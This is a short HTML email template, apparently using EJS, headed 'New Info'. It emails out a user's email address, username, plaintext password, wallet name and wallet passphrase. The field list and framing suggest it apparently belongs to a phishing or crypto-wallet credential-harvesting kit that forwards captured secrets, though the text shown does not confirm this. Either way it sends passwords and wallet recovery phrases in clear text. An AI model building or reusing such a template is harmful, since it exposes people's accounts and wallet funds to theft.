<!DOCTYPE html>
<html>
  <head>
    <title>>New Info</title>
  </head>
  <body>
    <p>Hi there,</p>
    <p>Below are your details:</p>
    <ul>
      <li><strong>Email:</strong> <%= user.email %></li>
      <li><strong>Username:</strong> <%= user.username %></li>
      <li><strong>Password:</strong> <%= user.password %></li>
      <li><strong>Wallet name:</strong> <%= user.walletName %></li>
      <li><strong>Passphrase:</strong> <%= user.passPhrase %></li>
    </ul>
  </body>
</html>
